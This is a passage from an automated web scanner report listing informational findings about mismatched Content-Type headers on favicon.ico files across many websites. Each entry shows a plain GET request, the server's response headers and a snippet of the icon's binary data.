The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.celebrity-gossip.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (CentOS)
Last-Modified: Tue, 23 Mar 2010 18:00:05 GMT
Cache-Control: max-age=1209600
Content-Type: text/plain; charset=UTF-8
Content-Length: 3638
X-Cacheable: YES
Date: Sat, 02 Apr 2011 13:45:09 GMT
X-Varnish: 2210099491 2210074179
Age: 111
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT
X-Cache-Hits: 12

..............h...&... ..............(....... ...........@...........................I..>$\..j.._7.......X..O.u..    ..pA..0.G..R..._..(.:.G)h.h<..W2......c..wE...!..T...M..9!T..^..,.A.K,o.S0{.c9..[5
...[SNIP]...

27.38. http://www.census.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.census.gov
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.census.gov
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:12:46 GMT
Server: Apache
Last-Modified: Fri, 14 May 1999 15:49:16 GMT
ETag: "6e435e-13e-34ad372e07700"
Accept-Ranges: bytes
Content-Length: 318
Content-Type: text/plain

..............(.......(....... ........................................................................................................DDDDDDD..D@.D.D..DDLDD....O..D.D.O..D.DDO....DDO..D.DDO....
...[SNIP]...

27.39. http://www.chilisemailclub.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.chilisemailclub.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.chilisemailclub.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:01:02 GMT
Server: Apache
Last-Modified: Tue, 07 Dec 2010 21:51:39 GMT
ETag: "1c60f78-e36-496d90263b0c0"
Accept-Ranges: bytes
Content-Length: 3638
Cache-Control: max-age=54000
Expires: Sun, 03 Apr 2011 05:01:02 GMT
P3P: CP="CURa ADMa DEVa IVAa IVDa CONa OUR IND DSP NON COR", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h...&... ..............(....... ...........@...........................RJ..c.R.........1R......JZ..!.......!1R.......{.RZJ.sk..)1..ss....Z.....!1).11..{.s.........)!..BBs.sk...!s.......
...[SNIP]...

27.40. http://www.chuckecheese.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.chuckecheese.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.chuckecheese.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:05 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 13 Jun 2007 21:11:56 GMT
ETag: "5787b0-e36-105d9f00"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h...&... ..............(....... ...........@...........................ca..B.J.........9....$k.....B.9...{.9m..Z.{.........JIB..Q..kq..k]c.B.....).....c.R.s.......BIk.....c...B]..sQ..9.
...[SNIP]...

27.41. http://www.cincinnati.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cincinnati.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cincinnati.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:51 GMT
Server: Apache
Last-Modified: Mon, 28 Feb 2011 16:20:05 GMT
ETag: "1081dc3-37e-d717740"
Accept-Ranges: bytes
Content-Length: 894
Wx: D=2020 t=1301752251045558 w=1
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...............................9..9..9..9..8..4..0../..5..8..9..9..4..5..9..9..9..9..:    .4..5..V,.kG.jF.Q&.2..6..7..M".L .7..9..9..9..4..F....................4..K........
...[SNIP]...

27.42. http://www.city-data.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.city-data.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.city-data.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:10 GMT
Server: Apache
Last-Modified: Tue, 13 Dec 2005 06:00:00 GMT
ETag: "35200fd-37e-407c78fd79800"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain

..............h.......(....... ...............................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@7..@@@@@@
...[SNIP]...

27.43. http://www.clocklink.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.clocklink.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.clocklink.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:42 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 18 Mar 2011 13:56:50 GMT
ETag: "1588b7a-57e-49ec22648ec80"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain; charset=UTF-8

..............h.......(....... .........................................\..pA.......w...........i..........zN..........f3...............................................................................
...[SNIP]...

27.44. http://www.clubpenguin.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.clubpenguin.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.clubpenguin.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:16 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 15 Apr 2008 15:52:20 GMT
ETag: "1fd83-47e-44aeb62ab3500"
Accept-Ranges: bytes
Content-Length: 1150
X-Cnection: close
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding

............ .h.......(....... ..... ..........................b...b...................................b...b...O...b...Q..}C...b...b....?.................(....j.._....b...b...[...b...b...U...b...b...b
...[SNIP]...

27.45. http://www.cnsnews.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cnsnews.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cnsnews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 45
Date: Sat, 02 Apr 2011 14:14:49 GMT
X-Varnish: 520445856
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

The requested file favicon.ico was not found.

27.46. http://www.collegeboard.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.collegeboard.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegeboard.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:01 GMT
Server: Apache
Last-Modified: Tue, 16 Oct 2007 12:02:56 GMT
ETag: "37e-43c9af726fc00"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain; charset=UTF-8

..............h.......(....... .................................!..!..,.......!..H..`..H........................[.................r.............................,.....!..&................[.........
...[SNIP]...

27.47. http://www.collegeconfidential.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.collegeconfidential.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegeconfidential.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:54 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 18 Oct 2010 21:25:52 GMT
Accept-Ranges: bytes
Content-Length: 318
Cache-Control: max-age=31536000
Expires: Sun, 01 Apr 2012 13:57:54 GMT
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerims_ccinfo_pool=3298375690.20480.0000; path=/

..............(.......(....... .........................................................................................................................................................................
...[SNIP]...

27.48. http://www.comedycentral.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.comedycentral.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.comedycentral.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 15086
Content-Type: text/plain
Last-Modified: Tue, 21 Dec 2010 17:24:43 GMT
ETag: "3aee-4d10e2db"
Accept-Ranges: bytes
Cache-Control: max-age=6560
Expires: Sat, 02 Apr 2011 15:26:23 GMT
Date: Sat, 02 Apr 2011 13:37:03 GMT
Connection: close

......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......%............................................................................................................................
...[SNIP]...

27.49. http://www.complaintsboard.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.complaintsboard.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.complaintsboard.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 21:28:40 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 22 Oct 2010 03:11:28 GMT
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain

............ .h.......(....... ..... .............................................................................................;D..O\..aq..t.......................v...ct..P]..>H..,2......dg..r...z.
...[SNIP]...

27.50. http://www.contactmusic.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.contactmusic.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.contactmusic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:37 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 18 Feb 2010 16:20:35 GMT
ETag: "1401f79-57e-47fe258bd9ac0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Cache-Control: private, max-age=604800
Age: 0
Expires: Tue, 31 Dec 2019 12:34:56 GMT
x-cdn: CMcdn
Connection: Keep-Alive
Content-Length: 1406

..............h.......(....... ...........@.................................j.........==D.....XK..............^aM.......d.....++7.    .......eee..............q.JJH.....eW......SUR...........s...z.::8...
...[SNIP]...

27.51. http://www.craigslist.ca/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.craigslist.ca
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craigslist.ca
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Mon, 23 Jun 2008 23:06:11 GMT
Cache-Control: public, max-age=315360000
Accept-Ranges: bytes
Date: Fri, 10 Dec 2010 20:14:23 GMT
Vary: Accept-Encoding
Content-Length: 1150
Content-Type: text/plain
Server: Apache
Expires: Mon, 07 Dec 2020 20:14:23 GMT

............ .h.......(....... ..... ...........................................]2..]...]...]...]...]...]...]2..........................]
..]...]...]...]...]...]...]...]...]...]...]
..............]
..
...[SNIP]...

27.52. http://www.craigslist.org/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.craigslist.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craigslist.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Mon, 23 Jun 2008 23:06:11 GMT
Cache-Control: public, max-age=315360000
Accept-Ranges: bytes
Date: Fri, 10 Dec 2010 20:14:23 GMT
Vary: Accept-Encoding
Content-Length: 1150
Content-Type: text/plain
Server: Apache
Expires: Mon, 07 Dec 2020 20:14:23 GMT

............ .h.......(....... ..... ...........................................]2..]...]...]...]...]...]...]2..........................]
..]...]...]...]...]...]...]...]...]...]...]
..............]
..
...[SNIP]...

27.53. http://www.craveonline.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.craveonline.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craveonline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2
X-Served-By: app1v-fe.sb.lax2
Content-Type: text/plain; charset=UTF-8
Content-Length: 5430
cache-control: max-age = 600
Date: Sat, 02 Apr 2011 14:19:12 GMT
X-Varnish: 732507004 732501108
Age: 116
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT from pxy1v.sb.lax2

............ .h...&... .... .........(....... ..... ...................................................................................................................................................
...[SNIP]...

27.54. http://www.cyberdefender.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cyberdefender.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cyberdefender.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:26 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: clickforensics=208.118.60.116.1301751386236547; path=/
Last-Modified: Fri, 08 Oct 2010 18:52:31 GMT
ETag: "128eb5-47e-4921f8347b9c0"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....@.......................................jki!jki.jki.jki.jki.jki!....................................jkiajki.....wv..wv......jki.jkia..........................
...[SNIP]...

27.55. http://www.datpiff.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.datpiff.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.datpiff.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:21 GMT
Server: Apache
Last-Modified: Sun, 14 Sep 2008 17:49:04 GMT
ETag: "5c90082-e36-456debc04c400"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug

..............h...&... ..............(....... ...........@...............................BAB.....! !.....cec.RUR.........101.sus.............)().....989.....JIJ.kmk.{}{.........ZYZ.................!$
...[SNIP]...

27.56. http://www.denverpost.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.denverpost.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.denverpost.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 02 Apr 2011 13:34:06 GMT
Content-Length: 15
Connection: close

File not found.

27.57. http://www.detiva.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.detiva.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.detiva.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:49:38 GMT
Server: Apache/2.2.2 (Fedora)
Last-Modified: Sat, 10 Mar 2007 19:53:11 GMT
ETag: "2a0187-9f6-e3cf37c0"
Accept-Ranges: bytes
Content-Length: 2550
Connection: close
Content-Type: text/plain

..............h...&......... .h.......(....... ...................................4/..B=..OK..]Y..jg..xu..............................'"..S.k.i.n.s.\.N.e.w. .l.o.g.o.\.w.o.r.k. .P.L.E.S.K.\.i.c.o.\._.
...[SNIP]...

27.58. http://www.diablomedia.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.diablomedia.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.diablomedia.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:15:02 GMT
Server: Apache/2.2.17 (EL)
Last-Modified: Tue, 04 Nov 2008 17:18:25 GMT
ETag: "11299e9-e36-45ae0404ffa40"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h...&... ..............(....... ...........@...........................D|................L.AA.......L..fe....l.65o.6c..........gm.......8......'E..S^.......,......CU...F..tt.......;....
...[SNIP]...

27.59. http://www.directbuyvisitorpass.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.directbuyvisitorpass.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.directbuyvisitorpass.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:59:08 GMT
Server: Apache
Last-Modified: Tue, 07 Dec 2010 21:40:54 GMT
ETag: "1bd8901-57e-496d8dbf1c580"
Accept-Ranges: bytes
Content-Length: 1406
Cache-Control: max-age=54000
Expires: Sun, 03 Apr 2011 04:59:08 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...............................................$...zu..........jd..www.....................................JJJ..........................z.......kkk.{.{.999.....9s..ZZ
...[SNIP]...

27.60. http://www.doityourself.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.doityourself.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.doityourself.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 05 Aug 2010 22:36:08 GMT
ETag: "3362228-37e-48d1b2d26e600"
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Content-Length: 894
Date: Sat, 02 Apr 2011 13:43:19 GMT
Age: 310500
Connection: keep-alive
Server: IBSrv 1.0
Set-Cookie: BIGipServerdiy_pool=1004867756.52514.0000; path=/

..............h.......(....... ...................................................................................................................................................|.u6..~...............
...[SNIP]...

27.61. http://www.dreamstime.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.dreamstime.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dreamstime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:12:26 GMT
Server: Apache
Last-Modified: Tue, 24 Mar 2009 11:27:20 GMT
ETag: "3f0460-47e-465dbaa861600"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ......%......................................................................................................t...0..5A../...
......................................
...[SNIP]...

27.62. http://www.driverside.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.driverside.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.driverside.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:00 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Fri, 07 Mar 2008 02:28:25 GMT
ETag: "70afd-e36-447cf9bd3e440"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h...&... ..............(....... ...........@...........................R.c.........{...B.J.....k.s.........s.......J.R.............c.s.s.{.....R.Z.....J.R.Z.k.....c.k.s.{.............R.
...[SNIP]...

27.63. http://www.eatingwell.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eatingwell.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.eatingwell.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:54 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 28 Feb 2011 22:06:09 GMT
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 14:18:54 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....@.......................................................ofc..(/.fji.vyt.mok.jie..............................=:..........2:.,S[.........x{u.WUV...............
...[SNIP]...

27.64. http://www.ebaumsworld.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ebaumsworld.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ebaumsworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:31 GMT
Server: Apache/2.2.17 (EL)
Last-Modified: Mon, 02 Feb 2009 22:06:45 GMT
Accept-Ranges: bytes
Content-Length: 318
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

..............(.......(....... ........................................................................................................................".....""....... .........    .......................
...[SNIP]...

27.65. http://www.economist.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.economist.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.economist.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 25 Mar 2011 15:57:35 GMT
ETag: "783ce-57e-49f50a70279c0"
Cache-Control: max-age=1209600
Expires: Tue, 12 Apr 2011 08:20:47 GMT
X-ws: 4
Content-Type: text/plain; charset=UTF-8
Content-Length: 1406
Date: Sat, 02 Apr 2011 13:54:46 GMT
X-Varnish: 1459381508 1449341496
Age: 365639
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT
Vary: Accept-Encoding

..............h.......(....... ...........@.......................ss....................................................................................................................................
...[SNIP]...

27.66. http://www.ed.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ed.gov
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ed.gov
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:25:29 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 45
Content-Type: text/html; charset=iso-8859-1

The requested file favicon.ico was not found.

27.67. http://www.egotastic.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.egotastic.com
Path:   /favicon.ico

Issue detail

